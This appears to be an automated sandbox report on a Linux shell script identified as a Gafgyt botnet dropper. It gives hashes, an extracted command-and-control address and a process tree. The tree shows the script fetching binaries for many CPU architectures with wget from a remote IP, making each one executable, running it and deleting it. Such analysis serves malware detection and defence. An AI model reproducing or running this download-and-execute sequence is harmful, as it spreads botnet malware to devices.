Analysis
-
max time kernel
4s -
max time network
131s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
04/08/2024, 13:39
Static task
static1
Behavioral task
behavioral1
Sample
sex.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
sex.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
sex.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
sex.sh
-
Size
1KB
-
MD5
4a5211253d90ad66dea73ffa8809bbd8
-
SHA1
27c91298804fd2e46e280d4259170e6a48e4280d
-
SHA256
bee780a07d3c76bc39ab97f88050339da7c3231987c32e14aca61515d7a0c276
-
SHA512
a844fe1fdd89254ff069b0bc3fa3b5812936f9560f693cd6c5658f4232f42efc9e926a3d51bd152a16283c8ab322967f6f7686f536ea395047477661b9aad0eb
Malware Config
Extracted
gafgyt
5.252.177.70:23
Signatures
-
Detected Gafgyt variant 1 IoCs
resource yara_rule behavioral1/files/fstream-1.dat family_gafgyt -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/arm61 1516 arm61 -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/arm61 wget
Processes
-
/tmp/sex.sh/tmp/sex.sh1⤵PID:1480
-
/usr/bin/wgetwget http://216.172.177.16/mips2⤵PID:1481
-
-
/bin/chmodchmod +x mips2⤵PID:1491
-
-
/tmp/mips./mips2⤵PID:1492
-
-
/bin/rmrm -rf mips2⤵PID:1493
-
-
/usr/bin/wgetwget http://216.172.177.16/mipsel2⤵PID:1494
-
-
/bin/chmodchmod +x mipsel2⤵PID:1495
-
-
/tmp/mipsel./mipsel2⤵PID:1496
-
-
/bin/rmrm -rf mipsel2⤵PID:1497
-
-
/usr/bin/wgetwget http://216.172.177.16/sh42⤵PID:1498
-
-
/bin/chmodchmod +x sh42⤵PID:1499
-
-
/tmp/sh4./sh42⤵PID:1500
-
-
/bin/rmrm -rf sh42⤵PID:1501
-
-
/usr/bin/wgetwget http://216.172.177.16/x862⤵PID:1502
-
-
/bin/chmodchmod +x x862⤵PID:1503
-
-
/tmp/x86./x862⤵PID:1504
-
-
/bin/rmrm -rf x862⤵PID:1505
-
-
/usr/bin/wgetwget http://216.172.177.16/arm612⤵
- Writes file to tmp directory
PID:1506
-
-
/bin/chmodchmod +x arm612⤵PID:1515
-
-
/tmp/arm61./arm612⤵
- Executes dropped EXE
PID:1516
-
-
/bin/rmrm -rf arm612⤵PID:1518
-
-
/usr/bin/wgetwget http://216.172.177.16/i6862⤵PID:1519
-
-
/bin/chmodchmod +x i6862⤵PID:1520
-
-
/tmp/i686./i6862⤵PID:1521
-
-
/bin/rmrm -rf i6862⤵PID:1522
-
-
/usr/bin/wgetwget http://216.172.177.16/ppc2⤵PID:1523
-
-
/bin/chmodchmod +x ppc2⤵PID:1524
-
-
/tmp/ppc./ppc2⤵PID:1525
-
-
/bin/rmrm -rf ppc2⤵PID:1526
-
-
/usr/bin/wgetwget http://216.172.177.16/5862⤵PID:1527
-
-
/bin/chmodchmod +x 5862⤵PID:1528
-
-
/tmp/586./5862⤵PID:1529
-
-
/bin/rmrm -rf 5862⤵PID:1530
-
-
/usr/bin/wgetwget http://216.172.177.16/m68k2⤵PID:1531
-
-
/bin/chmodchmod +x m68k2⤵PID:1532
-
-
/tmp/m68k./m68k2⤵PID:1533
-
-
/bin/rmrm -rf m68k2⤵PID:1534
-
-
/usr/bin/wgetwget http://216.172.177.16/dc2⤵PID:1535
-
-
/bin/chmodchmod +x dc2⤵PID:1536
-
-
/tmp/dc./dc2⤵PID:1537
-
-
/bin/rmrm -rf dc2⤵PID:1538
-
-
/usr/bin/wgetwget http://216.172.177.16/dss2⤵PID:1539
-
-
/bin/chmodchmod +x dss2⤵PID:1540
-
-
/tmp/dss./dss2⤵PID:1541
-
-
/bin/rmrm -rf dss2⤵PID:1542
-
-
/usr/bin/wgetwget http://216.172.177.16/co2⤵PID:1543
-
-
/bin/chmodchmod +x co2⤵PID:1544
-
-
/tmp/co./co2⤵PID:1545
-
-
/bin/rmrm -rf co2⤵PID:1546
-
-
/usr/bin/wgetwget http://216.172.177.16/scar2⤵PID:1547
-
-
/bin/chmodchmod +x scar2⤵PID:1548
-
-
/tmp/scar./scar2⤵PID:1549
-
-
/bin/rmrm -rf scar2⤵PID:1550
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
136KB
MD56820e48a7c8f9b287da8f0593b0a8f83
SHA14e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f
SHA256eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811
SHA5120dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c